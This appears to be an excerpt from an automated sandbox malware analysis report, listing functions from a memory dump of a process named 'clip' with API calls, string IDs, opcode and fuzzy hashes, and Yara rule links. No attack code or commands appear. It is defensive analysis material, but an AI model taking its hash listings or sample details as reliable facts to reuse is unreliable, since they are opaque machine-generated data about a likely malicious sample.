                            • Instruction Fuzzy Hash: 60F0927668171077E231629A8C47FD7768CCBC1B75F240119F74DAB2C2D9E5BC4182EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E7B80 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(009D10A9,?,009E43B7,009D10A9,009E3FA7,009E43B7,?,009D10A9,009E3FA7,00001000,?,?,009E9403), ref: 009E7BB9
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: cafb8f76770284ae2fda25ebf327b2959180f137cf7a17c5607591ce1f20e946
                            • Instruction ID: 9a18fc0f11ed3dc720500a2aab63ede504e91dd2a8d60708c8680be2c8fa0013
                            • Opcode Fuzzy Hash: cafb8f76770284ae2fda25ebf327b2959180f137cf7a17c5607591ce1f20e946
                            • Instruction Fuzzy Hash: F8E06D716002047FC614EE59DC42F9B73ACEFC9710F008408FD18A7242D630B91087B4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E7BC0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5BCC3C83,00000007,00000000,00000004,00000000,009D3737,000000F4,?,?,?,?,?), ref: 009E7BFC
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 85fc327bcadd38c8cf3064b0416580a8f65f1a7e55e15e60e19501c6be1942a8
                            • Instruction ID: 5b89b14c5df32aed340a08f044cbbada67372f5dd62c9bf7418f9f6eb876d9f6
                            • Opcode Fuzzy Hash: 85fc327bcadd38c8cf3064b0416580a8f65f1a7e55e15e60e19501c6be1942a8
                            • Instruction Fuzzy Hash: 15E065B2600208BFDA14EE99DC41F9B77ACEFCA720F004408F908A7242C630B910CAB9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D7580 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,009D1380,009E66C7,009E3FA7,?), ref: 009D75B3
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 385b3be66e954356ed21a965ce3db68db62c9ecf876a9d408ad9b29bc2f4dd2d
                            • Instruction ID: 6d2cde382f9f2969d1dd313be00a5b9972e74b54fc3b7b5208afebfabf59af03
                            • Opcode Fuzzy Hash: 385b3be66e954356ed21a965ce3db68db62c9ecf876a9d408ad9b29bc2f4dd2d
                            • Instruction Fuzzy Hash: 87D05E71A843043BF604A6F5DC53F96328C9B84758F144068BA4CDB2C2E965F9408566
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f2d3176a12e2f7ac9bec6986a13ceea54f157ba950453f58f3d761f29f284ea1
                            • Instruction ID: 68a70902ad95ded68ed8972676c5d2f9ac267fba0d678a026620b926af01ee3e
                            • Opcode Fuzzy Hash: f2d3176a12e2f7ac9bec6986a13ceea54f157ba950453f58f3d761f29f284ea1
                            • Instruction Fuzzy Hash: 06B09B719015C5DAFB11F760460C71779016BD0715F15C071D3030641E4738D1D1E175
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 009C9386 Relevance: 30.1, Strings: 24, Instructions: 127COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $$)$)A$8$:'$>*$>{$Dy$E($WG$Z,$`t$c_$d5$dG$f$m$o#$sI$7$9$=$>$g
                            • API String ID: 0-2458297324
                            • Opcode ID: e3e8724af2d55466043363e583cfdd02ba9da6e0bb50d81d17c5e7bcafb26fd2
                            • Instruction ID: d42c8f06e60be09100aecb3025240a5ebf428db4c0119b88d8d00df6afaa6e85
                            • Opcode Fuzzy Hash: e3e8724af2d55466043363e583cfdd02ba9da6e0bb50d81d17c5e7bcafb26fd2
                            • Instruction Fuzzy Hash: 718146B0D06369CEEB61CF91C9587DEBAB1BB45308F1085D9C15C7B281C7BA0A89CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: c726b22997845d0c208a080be6cbdd4dc3593908d5030e42a2576edc0cbd98f1
                            • Instruction ID: 62d25f393dea5c09e240d591e2ece6606348a212a83eee2251105ab47758f7ee
                            • Opcode Fuzzy Hash: c726b22997845d0c208a080be6cbdd4dc3593908d5030e42a2576edc0cbd98f1
                            • Instruction Fuzzy Hash: 9E51C5B2B00556BBDB10EF9988D097EF7BABB48204714C1A9E45AD7641E234FE40DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C57630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C94787
                            • Execute=1, xrefs: 04C94713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C94742
                            • ExecuteOptions, xrefs: 04C946A0
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C94725
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C94655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C946FC
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: ea174ec3aab9ac4a9250b5154ed8d75af8a0e825daacea13ef246eadddb0edec
                            • Instruction ID: 1b468e5cbbae464b283ea3be284bd83a9a5540fb8e99e824141e61e06c495aeb
                            • Opcode Fuzzy Hash: ea174ec3aab9ac4a9250b5154ed8d75af8a0e825daacea13ef246eadddb0edec
                            • Instruction Fuzzy Hash: B8510B31601219BBEF11ABA4DC99BAD77AAEF04304F0400A9D905A71A0EB71BEC1DF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C6B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                            • Instruction ID: 7bc12cde037510d0316d6927818cd24f37cf6e9d2d75ee1fec393c5c05dd32fb
                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                            • Instruction Fuzzy Hash: 5381BF70E452699EDF288E68C8D17FEBBA3AF45310F18C119D857E7291E734BE418B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C4F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C902E7
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C902BD
                            • RTL: Re-Waiting, xrefs: 04C9031E
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: 0a9287e70e85e6f1c989e0efe082c7d7b322c242110f7f9258f740c52f5ed7c5
                            • Instruction ID: 872b8c0418d38b301b774a0e0b161f3ba32e1befb266209876b6622622ba1ebf
                            • Opcode Fuzzy Hash: 0a9287e70e85e6f1c989e0efe082c7d7b322c242110f7f9258f740c52f5ed7c5
                            • Instruction Fuzzy Hash: CAE1C030604741AFDB25CF29C984B6AB7E2FF89324F144A5DE5A58B2E0D774F944CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C5BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C97B7F
                            • RTL: Re-Waiting, xrefs: 04C97BAC
                            • RTL: Resource at %p, xrefs: 04C97B8E
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: d1cfec4cb3a7d9afea4a71e3a27f33400d4df7fb3b39066f0c81b9006d9fe0e2
                            • Instruction ID: 3c70319b41351d9cd96b13c749b6ff23ed9c89c94b922ce366d522fe9479cf8b
                            • Opcode Fuzzy Hash: d1cfec4cb3a7d9afea4a71e3a27f33400d4df7fb3b39066f0c81b9006d9fe0e2
                            • Instruction Fuzzy Hash: B74114353017029FDB20DE25C840B6ABBE7EF88714F100A2DF95ADB690EB70F9458B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C5B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C9728C
                            Strings
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C97294
                            • RTL: Re-Waiting, xrefs: 04C972C1
                            • RTL: Resource at %p, xrefs: 04C972A3
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 8b4c754278e212f7d81895253174909071a689145185a3343e55e56db724bd54
                            • Instruction ID: 21e6385cf7457087533c51b6f2bce2d20eeddbc482a305b804401ddf25f168cc
                            • Opcode Fuzzy Hash: 8b4c754278e212f7d81895253174909071a689145185a3343e55e56db724bd54
                            • Instruction Fuzzy Hash: 14411E31712602EBDB24DE25CC81B6AB7E2EB84718F144618FD45AB240EB30FC929BD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C67D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                            • Instruction ID: d0c88410dd83538ebf6c600af415f1b6cc07cc226ca1e1ae57bf36c13bd42e51
                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                            • Instruction Fuzzy Hash: C1919970E022159FDB24DE59C8C1ABEB7A7AF44718F14CD1EE857A72C0E734AA418761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C29126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 6ae4178fe06f46b6691979a7d908c7f9a526e87cff4aa622ca01a3fbb579d250
                            • Instruction ID: b564b124083ee952ead1eb4f59685bcf11f9485d3f0edf93bde610fb4636c3de
                            • Opcode Fuzzy Hash: 6ae4178fe06f46b6691979a7d908c7f9a526e87cff4aa622ca01a3fbb579d250
                            • Instruction Fuzzy Hash: AE813CB5D002699BDB31DF54CD48BEEB7B5AF08714F0041EAA909B7250E770AE84DFA0
                            Uniqueness

                            Uniqueness Score: -1.00%